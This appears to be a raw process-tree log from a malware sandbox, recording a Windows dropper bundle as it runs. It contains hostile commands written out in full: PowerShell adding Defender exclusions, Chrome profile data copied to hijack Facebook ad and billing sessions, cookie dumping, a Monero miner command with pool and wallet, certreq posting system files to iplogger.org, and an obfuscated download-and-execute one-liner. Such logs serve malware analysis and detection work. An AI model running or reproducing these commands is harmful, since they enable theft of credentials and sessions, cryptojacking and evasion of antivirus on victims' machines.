C:\Users\Admin\AppData\Local\Temp\is-NNLJ1.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-NNLJ1.tmp\PictureLAb.tmp" /SL5="$A02E0,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\PictureLAb.exe" /Verysilent11⤵PID:5952
-
C:\Users\Admin\AppData\Local\Temp\is-7P077.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7P077.tmp\Setup.exe" /VERYSILENT12⤵PID:7628
-
C:\Users\Admin\AppData\Local\Temp\is-CJIAM.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-CJIAM.tmp\Setup.tmp" /SL5="$60694,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-7P077.tmp\Setup.exe" /VERYSILENT13⤵PID:6284
-
C:\Users\Admin\AppData\Local\Temp\is-S98EV.tmp\kkkk.exe"C:\Users\Admin\AppData\Local\Temp\is-S98EV.tmp\kkkk.exe" /S /UID=lab21414⤵PID:7500
-
C:\Users\Admin\AppData\Local\Temp\80-a1d0b-702-dedaf-516fe61794703\Pybenaeduqi.exe"C:\Users\Admin\AppData\Local\Temp\80-a1d0b-702-dedaf-516fe61794703\Pybenaeduqi.exe"15⤵PID:1468
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vvsdx2yp.vti\GcleanerWW.exe /mixone & exit16⤵PID:8408
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kocaecxq.nr3\privacytools5.exe & exit16⤵PID:8660
-
C:\Users\Admin\AppData\Local\Temp\kocaecxq.nr3\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\kocaecxq.nr3\privacytools5.exe17⤵PID:5684
-
C:\Users\Admin\AppData\Local\Temp\kocaecxq.nr3\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\kocaecxq.nr3\privacytools5.exe18⤵PID:1964
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2kpjuba2.gyn\setup.exe /8-2222 & exit16⤵PID:8952
-
C:\Users\Admin\AppData\Local\Temp\2kpjuba2.gyn\setup.exeC:\Users\Admin\AppData\Local\Temp\2kpjuba2.gyn\setup.exe /8-222217⤵PID:6676
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Young-Resonance"18⤵PID:8156
-
-
C:\Program Files (x86)\Young-Resonance\7za.exe"C:\Program Files (x86)\Young-Resonance\7za.exe" e -p154.61.71.51 winamp-plugins.7z18⤵PID:9424
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Young-Resonance\setup.exe" -map "C:\Program Files (x86)\Young-Resonance\WinmonProcessMonitor.sys""18⤵PID:6136
-
C:\Program Files (x86)\Young-Resonance\setup.exe"C:\Program Files (x86)\Young-Resonance\setup.exe" -map "C:\Program Files (x86)\Young-Resonance\WinmonProcessMonitor.sys"19⤵PID:10852
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1p4yaa0n.c2d\MultitimerFour.exe & exit16⤵PID:5144
-
C:\Users\Admin\AppData\Local\Temp\1p4yaa0n.c2d\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\1p4yaa0n.c2d\MultitimerFour.exe17⤵PID:6764
-
C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10418⤵PID:9764
-
C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe" 1 3.1615015051.60432c8bbe43d 10419⤵PID:4440
-
C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\S281H67LKT\multitimer.exe" 2 3.1615015051.60432c8bbe43d20⤵PID:8368
-
C:\Users\Admin\AppData\Local\Temp\5yfu5bxeor2\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\5yfu5bxeor2\chashepro3.exe" /VERYSILENT21⤵PID:9756
-
C:\Users\Admin\AppData\Local\Temp\is-BFMEA.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-BFMEA.tmp\chashepro3.tmp" /SL5="$50994,2015144,58368,C:\Users\Admin\AppData\Local\Temp\5yfu5bxeor2\chashepro3.exe" /VERYSILENT22⤵PID:10432
-
-
-
C:\Users\Admin\AppData\Local\Temp\gmxy14tfz54\d4oc3ftx3um.exe"C:\Users\Admin\AppData\Local\Temp\gmxy14tfz54\d4oc3ftx3um.exe" /ustwo INSTALL21⤵PID:8748
-
-
C:\Users\Admin\AppData\Local\Temp\pxhjiddrb2a\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\pxhjiddrb2a\Setup3310.exe" /Verysilent /subid=57721⤵PID:6004
-
C:\Users\Admin\AppData\Local\Temp\is-ND199.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-ND199.tmp\Setup3310.tmp" /SL5="$40992,802346,56832,C:\Users\Admin\AppData\Local\Temp\pxhjiddrb2a\Setup3310.exe" /Verysilent /subid=57722⤵PID:10356
-
C:\Users\Admin\AppData\Local\Temp\is-7HDTO.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-7HDTO.tmp\Setup.exe" /Verysilent23⤵PID:9664
-
C:\Users\Admin\AppData\Local\Temp\is-DFF2K.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-DFF2K.tmp\Setup.tmp" /SL5="$30A6A,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-7HDTO.tmp\Setup.exe" /Verysilent24⤵PID:10056
-
C:\Users\Admin\AppData\Local\Temp\is-KILCR.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-KILCR.tmp\ProPlugin.exe" /Verysilent25⤵PID:11160
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\024eeji5cno\safebits.exe"C:\Users\Admin\AppData\Local\Temp\024eeji5cno\safebits.exe" /S /pubid=1 /subid=45121⤵PID:8492
-
-
C:\Users\Admin\AppData\Local\Temp\wks5cxwnlf5\vict.exe"C:\Users\Admin\AppData\Local\Temp\wks5cxwnlf5\vict.exe" /VERYSILENT /id=53521⤵PID:9676
-
C:\Users\Admin\AppData\Local\Temp\is-T1C7S.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-T1C7S.tmp\vict.tmp" /SL5="$10ACA,870426,780800,C:\Users\Admin\AppData\Local\Temp\wks5cxwnlf5\vict.exe" /VERYSILENT /id=53522⤵PID:10652
-
C:\Users\Admin\AppData\Local\Temp\is-S4QN3.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-S4QN3.tmp\wimapi.exe" 53523⤵PID:11140
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\u4twwb0v5aa\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\u4twwb0v5aa\askinstall24.exe"21⤵PID:9712
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe22⤵PID:10728
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe23⤵
- Kills process with taskkill
PID:11044
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y22⤵PID:6772
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/22⤵PID:7980
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7fff7d126e00,0x7fff7d126e10,0x7fff7d126e2023⤵PID:9452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,8856194880065896185,14091266374429307754,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1684 /prefetch:823⤵PID:4300
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gpnxbau2yhy\app.exe"C:\Users\Admin\AppData\Local\Temp\gpnxbau2yhy\app.exe" /8-2321⤵PID:10892
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\Delta.exe" /Verysilent10⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\is-C0DJT.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-C0DJT.tmp\Delta.tmp" /SL5="$A02B2,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\Delta.exe" /Verysilent11⤵PID:5228
-
C:\Users\Admin\AppData\Local\Temp\is-GTUTB.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GTUTB.tmp\Setup.exe" /VERYSILENT12⤵PID:7176
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-GTUTB.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit13⤵PID:684
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f14⤵
- Kills process with taskkill
PID:8792
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\zznote.exe" /Verysilent10⤵PID:6052
-
C:\Users\Admin\AppData\Local\Temp\is-PK48V.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-PK48V.tmp\zznote.tmp" /SL5="$607B0,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\zznote.exe" /Verysilent11⤵PID:6576
-
C:\Users\Admin\AppData\Local\Temp\is-P1T12.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-P1T12.tmp\jg4_4jaa.exe" /silent12⤵PID:8824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\hjjgaa.exe" /Verysilent10⤵PID:8524
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵PID:5268
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt11⤵PID:9372
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\tciyqsvddsf\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\tciyqsvddsf\askinstall24.exe"6⤵PID:2936
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:6984
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:6784
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y7⤵PID:5656
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/7⤵PID:7808
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf0,0xf4,0xf8,0xcc,0xfc,0x7fff7d126e00,0x7fff7d126e10,0x7fff7d126e208⤵PID:9648
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,8271947517716593420,9606451750761960326,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1668 /prefetch:88⤵PID:6484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yzovdjbss5m\safebits.exe"C:\Users\Admin\AppData\Local\Temp\yzovdjbss5m\safebits.exe" /S /pubid=1 /subid=4516⤵PID:5480
-
-
C:\Users\Admin\AppData\Local\Temp\3exndxzozwi\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\3exndxzozwi\chashepro3.exe" /VERYSILENT6⤵PID:5868
-
C:\Users\Admin\AppData\Local\Temp\is-905E2.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-905E2.tmp\chashepro3.tmp" /SL5="$602F0,2015144,58368,C:\Users\Admin\AppData\Local\Temp\3exndxzozwi\chashepro3.exe" /VERYSILENT7⤵PID:4784
-
-
-
C:\Users\Admin\AppData\Local\Temp\0ot14dy1qj4\p1jw504tfuh.exe"C:\Users\Admin\AppData\Local\Temp\0ot14dy1qj4\p1jw504tfuh.exe" /ustwo INSTALL6⤵PID:4536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6567⤵
- Program crash
PID:6464
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 6687⤵
- Program crash
PID:7792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 7727⤵
- Program crash
PID:6712
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 8087⤵
- Program crash
PID:196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 8927⤵
- Program crash
PID:6496
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 9327⤵
- Program crash
PID:4904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 10887⤵
- Program crash
PID:6508
-
-
-
C:\Users\Admin\AppData\Local\Temp\xf0v3tqwc2v\vict.exe"C:\Users\Admin\AppData\Local\Temp\xf0v3tqwc2v\vict.exe" /VERYSILENT /id=5356⤵PID:4212
-
C:\Users\Admin\AppData\Local\Temp\is-A71JV.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-A71JV.tmp\vict.tmp" /SL5="$30602,870426,780800,C:\Users\Admin\AppData\Local\Temp\xf0v3tqwc2v\vict.exe" /VERYSILENT /id=5357⤵PID:6804
-
C:\Users\Admin\AppData\Local\Temp\is-U360J.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-U360J.tmp\wimapi.exe" 5358⤵PID:7372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\klehdmb5tnk\app.exe"C:\Users\Admin\AppData\Local\Temp\klehdmb5tnk\app.exe" /8-236⤵PID:7688
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Small-Glitter"7⤵PID:7508
-
-
C:\Program Files (x86)\Small-Glitter\7za.exe"C:\Program Files (x86)\Small-Glitter\7za.exe" e -p154.61.71.51 winamp-plugins.7z7⤵PID:6288
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Small-Glitter\app.exe" -map "C:\Program Files (x86)\Small-Glitter\WinmonProcessMonitor.sys""7⤵PID:908
-
C:\Program Files (x86)\Small-Glitter\app.exe"C:\Program Files (x86)\Small-Glitter\app.exe" -map "C:\Program Files (x86)\Small-Glitter\WinmonProcessMonitor.sys"8⤵PID:7208
-
-
-
C:\Program Files (x86)\Small-Glitter\7za.exe"C:\Program Files (x86)\Small-Glitter\7za.exe" e -p154.61.71.51 winamp.7z7⤵PID:6856
-
-
C:\Program Files (x86)\Small-Glitter\app.exe"C:\Program Files (x86)\Small-Glitter\app.exe" /8-237⤵PID:10212
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\askinstall20.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:1224
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\md2_2efs.exe"2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2220
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\BTRSetp.exe"2⤵
- Executes dropped EXE
PID:2200 -
C:\ProgramData\7164603.78"C:\ProgramData\7164603.78"3⤵
- Executes dropped EXE
PID:1312
-
-
C:\ProgramData\4124017.45"C:\ProgramData\4124017.45"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3816 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"4⤵
- Executes dropped EXE
PID:4232
-
-
-
C:\ProgramData\1024029.11"C:\ProgramData\1024029.11"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops startup file
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2380 -
C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe"C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 8AfYmpCcgsWEG7YT6uL822JNdkh2dnvciZRHb3P2JcvDQEDvKTw2cyjRf99gEAMijX9DmFynXCxvPA5tJD1MNKjMSqq6YeH -p x -k -v=0 --donate-level=1 -t 14⤵PID:3948
-
-
-
C:\ProgramData\6477954.71"C:\ProgramData\6477954.71"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3356
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\gcttt.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4132 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵
- Executes dropped EXE
PID:4480
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt3⤵PID:5848
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3C6031AD6B30C6B1CBFD2ECBAF08A64C C2⤵
- Loads dropped DLL
PID:4064
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"1⤵PID:4160
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵PID:1120
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\22⤵PID:5712
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"1⤵PID:4244
-
C:\Program Files (x86)\JCleaner\Abbas.exe"C:\Program Files (x86)\JCleaner\Abbas.exe"1⤵PID:2504
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"1⤵PID:4448
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"2⤵PID:6236
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\21⤵PID:4492
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\22⤵PID:5788
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"1⤵PID:4740
-
C:\Users\Admin\AppData\Local\Temp\is-NB48A.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-NB48A.tmp\wimapi.exe" 5351⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\fRFj3IKV0.exe"C:\Users\Admin\AppData\Local\Temp\fRFj3IKV0.exe"2⤵PID:5252
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im fRFj3IKV0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\fRFj3IKV0.exe" & del C:\ProgramData\*.dll & exit3⤵PID:7240
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im fRFj3IKV0.exe /f4⤵
- Kills process with taskkill
PID:7516
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:7456
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"2⤵PID:8000
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:648
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c echo grYNxrw1⤵PID:5340
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=970391⤵PID:5540
-
C:\Users\Admin\AppData\Local\Temp\is-91ECC.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-91ECC.tmp\{app}\chrome_proxy.exe"1⤵PID:5584
-
C:\Users\Admin\AppData\Local\Temp\is-PJ0JQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PJ0JQ.tmp\Setup.exe" /Verysilent1⤵PID:5640
-
C:\Users\Admin\AppData\Local\Temp\is-78J1E.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-78J1E.tmp\Setup.tmp" /SL5="$30240,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-PJ0JQ.tmp\Setup.exe" /Verysilent2⤵PID:5728
-
C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\ProPlugin.exe" /Verysilent3⤵PID:5360
-
C:\Users\Admin\AppData\Local\Temp\is-G2MNH.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-G2MNH.tmp\ProPlugin.tmp" /SL5="$10490,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-1AEOA.tmp\ProPlugin.exe" /Verysilent4⤵PID:4856
-
C:\Users\Admin\AppData\Local\Temp\is-16G3U.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-16G3U.tmp\Setup.exe"5⤵PID:5080
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"6⤵PID:4800
-
C:\Windows\regedit.exeregedit /s chrome.reg7⤵
- Runs .reg file with regedit
PID:3616
-
-
C:\Windows\SYSTEM32\TASKKILL.exeTASKKILL /F /IM chrome.exe7⤵
- Kills process with taskkill
PID:860
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chrome64.bat7⤵PID:5668
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)8⤵PID:6544
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"9⤵PID:6700
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:/Program Files/Google/Chrome/Application/chrome.exe"10⤵PID:6952
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xe0,0xe4,0xe8,0xbc,0xec,0x7fff6cdd6e00,0x7fff6cdd6e10,0x7fff6cdd6e2011⤵PID:6992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1652 /prefetch:811⤵PID:4676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1604 /prefetch:211⤵PID:4196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,7558616885585238884,63571703745077041,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2700 /prefetch:111⤵PID:6344
-
-
